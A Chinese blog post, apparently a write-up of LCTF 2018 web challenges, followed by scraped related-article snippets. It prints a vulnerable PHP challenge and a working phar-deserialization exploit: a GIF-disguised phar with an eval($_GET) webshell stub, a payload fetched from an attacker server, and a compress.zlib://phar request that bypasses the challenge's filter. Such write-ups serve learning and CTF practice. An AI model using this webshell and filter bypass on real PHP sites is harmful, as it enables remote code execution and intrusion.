1、T4lk 1s ch34p,sh0w m3 the sh31l

代码如下:

<?php

$SECRET  = `../read_secret`;

$SANDBOX = "../data/" . md5($SECRET. $_SERVER["REMOTE_ADDR"]);

$FILEBOX = "../file/" . md5("K0rz3n". $_SERVER["REMOTE_ADDR"]);

mkdir($SANDBOX);

mkdir($FILEBOX);

echo "$FILEBOX";

if (!isset($_COOKIE["session-data"])) {

    $data = serialize(new User($SANDBOX));

    $hmac = hash_hmac("md5", $data, $SECRET);

    setcookie("session-data", sprintf("%s-----%s", $data, $hmac));

}

class User {

    public $avatar;

    function __construct($path) {

        $this->avatar = $path;

    }

}

class K0rz3n_secret_flag {

    protected $file_path;

    function __destruct(){

        if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){

            die("Sorry Sorry Sorry");

        }

    include_once($this->file_path);

 }

}

function check_session() {

    global $SECRET;

    $data = $_COOKIE["session-data"];

    list($data, $hmac) = explode("-----", $data, 2);

    if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)){

        die("Bye");

    }

    if ( !hash_equals(hash_hmac("md5", $data, $SECRET), $hmac) ){

        die("Bye Bye");

    }

    $data = unserialize($data);

    if ( !isset($data->avatar) ){

        die("Bye Bye Bye");

    }

    return $data->avatar;//返回上传路径

}

function upload($path) {

    if(isset($_GET['url'])){

         if(preg_match('/^(http|https).*/i', $_GET['url'])){

            $data = file_get_contents($_GET["url"] . "/avatar.gif");

            if (substr($data, 0, 6) !== "GIF89a"){

                die("Fuck off");

            }

            //?m=upload&url=http://vps/avatar.gif

            file_put_contents($path . "/avatar.gif", $data);

            die("Upload OK");

        }else{

            die("Hacker");

        }

    }else{

        die("Miss the URL~~");

    }

}

function show($path) {

    if ( !is_dir($path) || !file_exists($path . "/avatar.gif")) {

        $path = "/var/www";

    }

    header("Content-Type: image/gif");

    die(file_get_contents($path . "/avatar.gif"));

}

function check($path){

    if(isset($_GET['c'])){

        if(preg_match('/^(ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file)(.|\\s)*/i',$_GET['c'])){

            die("Hacker Hacker Hacker");

        }else{

            $file_path = $_GET['c'];

            list($width, $height, $type) = @getimagesize($file_path);

            die("Width is :" . $width." px<br>" .

                "Height is :" . $height." px<br>");

        }

    }else{

        list($width, $height, $type) = @getimagesize($path."/avatar.gif");

        die("Width is :" . $width." px<br>" .

            "Height is :" . $height." px<br>");

    }

}

function move($source_path,$dest_name){

    global $FILEBOX;

    $dest_path = $FILEBOX . "/" . $dest_name;

    if(preg_match('/(log|etc|session|proc|root|secret|www|history|file|\.\.|ftp|php|phar|zlib|data|glob|ssh2|rar|ogg|expect|http|https)/i',$source_path)){

        die("Hacker Hacker Hacker");

    }else{

        if(copy($source_path,$dest_path)){

            die("Successful copy");

        }else{

            die("Copy failed");

        }

    }

}

$mode = $_GET["m"];

if ($mode == "upload"){

     upload(check_session());

}

else if ($mode == "show"){

    show(check_session());

}

else if ($mode == "check"){

    check(check_session());

}

else if($mode == "move"){

    move($_GET['source'],$_GET['dest']);

}

else{

    highlight_file(__FILE__);

}

1、上传恶意文件,反序列化的时候包含上传的文件,注意生成的avatar.gif不仅可以反序列化覆盖上传路径$file_path,也可以通过setStub向恶意文件中写入php代码,文件包含

?m=upload&url=http://vps/avatar.gif

<?php

class K0rz3n_secret_flag {

    protected $file_path='/var/www/data/67bf5ff3cfa1cdd00f700328698c2adb/avatar.gif';

    function __destruct(){

        if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){

            die("Sorry Sorry Sorry");

        }

    include_once($this->file_path);

    }

 }

$a= new K0rz3n_secret_flag();

$p = new Phar('./1.phar', 0);

$p->startBuffering();

$p->setStub('GIF89a<?php echo 1;eval($_GET["a"]);?'.'><?php __HALT_COMPILER(); ?'.'>');

$p->setMetadata($a);

$p->addFromString('1.txt','text');

$p->stopBuffering();

rename('./1.phar', 'avatar.gif');

生成的恶意文件

2、check的时候触发反序列化。通过compress.zlib://phar绕过正则。参考链接:https://blog.zsxsoft.com/post/38

 http://212.64.7.171/LCTF.php?m=check&c=compress.zlib://phar:///var/www/data/dccb75e38fe3fc2c70fd169f263e6d37/avatar.gif&a=phpinfo();

2、bestphp's revenge

通过Soap类进行反序列化,进行ssrf.具体参考:https://xz.aliyun.com/t/3339#toc-3 https://xz.aliyun.com/t/3341#toc-22 https://www.anquanke.com/post/id/164569

参考链接:

https://xz.aliyun.com/t/3341#toc-8

https://xz.aliyun.com/t/3339#toc-4

https://xz.aliyun.com/t/3340#toc-3

http://www.k0rz3n.com/2018/11/19/LCTF%202018%20T4lk%201s%20ch34p,sh0w%20m3%20the%20sh31l%20%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/

LCTF wp简单复现的更多相关文章

  1. DVWA中low级的sql注入漏洞的简单复现

    第一次成功复现一个简单漏洞,于是写下这篇随笔记录一下 首先我们来看dvwa中low级的sql注入的源码 源码文件路径如下图: 源码如下: <?php if(isset($_GET['Submit ...

  2. CVE-2017-3248简单复现

    我是这样操作的 目标跟windows在一个段,linux是另一个段的,我的虚拟机 windows主机上 `java -cp ysoserial.jar ysoserial.exploit.JRMPLi ...

  3. PHP-FPM 远程代码执行漏洞(CVE-2019-11043)的简单复现学习

    1.概述 漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 f ...

  4. CVE-2020-5902 简单复现

    这几天通报了f5的一个漏洞,想着先弄个环境保存着,说不定后面就用到了.. 1.漏洞描述 ​ 近日,F5官方发布公告,修复了流量管理用户界面(TMUI)中存在的一个远程代码执行漏洞(CVE-2020-5 ...

  5. CVE-2019-0708简单复现

    各文件对应位置 rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb -> ...

  6. BUUCTF复现记录2

    [CISCN2019 华北赛区 Day1 Web1]Dropbox 打开题目,一个登录界面,SQL? sqlmap跑一下,没有注入,那么注册一下 登录之后,发现只有一个上传页面,源码里面也没有什么 那 ...

  7. addEventListener 和 onclick 简单比较

    首先说一下addEventListener 语法: element.addEventListener(event, function, useCapture) 这里的event是事件名,functio ...

  8. 2019-9-28:渗透测试,phpstudy后门,利用复现

    9月20号爆出Phpstudy存在隐藏后门,简单复现下后门效果 该文章仅供学习,利用方法来自网络文章,仅供参考 目标机:win7系统,安装phpstudy 2018版,php版本5.2或php 5.4 ...

  9. BUUCTF复现记录1

    平台地址:https://buuoj.cn/  里面很多之前的题目,不错的平台.另外幕后大哥博客https://www.zhaoj.in/     以下的解题,都是参考各位大佬的WP去复现,重在记录下 ...

随机推荐

  1. 十一、信号量控制Semaphore

    一.简介 有时候我们需要对一个资源的访问做线程数控制,以防雪崩等问题. JDK中,信号量可以处理这样的问题:Semaphore JDK文档:http://tool.oschina.net/upload ...

  2. Java SE 8 的流库学习笔记

    前言:流提供了一种让我们可以在比集合更高的概念级别上指定计算的数据视图.如: //使用foreach迭代 long count = 0; for (String w : words) { if (w. ...

  3. 远景GIS云上线

    没有发布会.没有嘉宾.没有掌声,趁着国庆假期悄悄地将系统部署到服务器上线运行. 远景GIS云(RGIS Cloud)基于自主研发的远景GIS基础平台开发,目前已实现了Shape上传和导出.符号配置.动 ...

  4. python单下划线、双下划线、头尾双下划线说明:

      单下划线.双下划线.头尾双下划线说明: __foo__: 定义的是特殊方法,一般是系统定义名字 ,类似 __init__() 之类的. _foo: 以单下划线开头的表示的是 protected 类 ...

  5. Search Insert Position 查找给定元素在数组中的位置,若没有则返回应该在的位置

    Given a sorted array and a target value, return the index if the target is found. If not, return the ...

  6. python迭代器 生成器 三元运算 列表解析

    1.迭代器 迭代器是访问集合元素的一种方式.迭代器对象从集合的第一个元素开始访问,直到所有的元素被访问完结束.迭代器只能往前不会后退,不过这也没什么,因为人们很少在迭代途中往后退.另外,迭代器的一大优 ...

  7. mysql中int、bigint、smallint 和 tinyint的区别与长度的含义【转】

    最近使用mysql数据库的时候遇到了多种数字的类型,主要有int,bigint,smallint和tinyint.其中比较迷惑的是int和smallint的差别.今天就在网上仔细找了找,找到如下内容, ...

  8. 几种常见的Windows 服务器无法联网/无法连接远程桌面等故障解决方案

    SEO优化扫我一.服务器无法连接远程桌面 1.Ping不通IP,网站打不开,不可以远程连接.可能是服务器死机了,或者网络有问题,请尝试Web重启服务器或联系服务商确认. 2.Ping正常,网站可以打开 ...

  9. asp.net生成PDF文件参考 .

    TextSharp 是用来生成  PDF 的一个组件,在 1998 年夏天的时候,Bruno Lowagie ,iText 的创作者,参与了学校的一个项目,当时使用 HTML 来生成报告,但是,使用 ...

  10. C指针和数组

    一.指针 指针就是地址,指针变量是用来存放地址的变量,把谁的地址存放在指针变量中,就说此指针变量指向谁. 二.数组 1.一维数组 一维数组名代表数组首元素的地址,因此 *a=a[0]; &:取 ...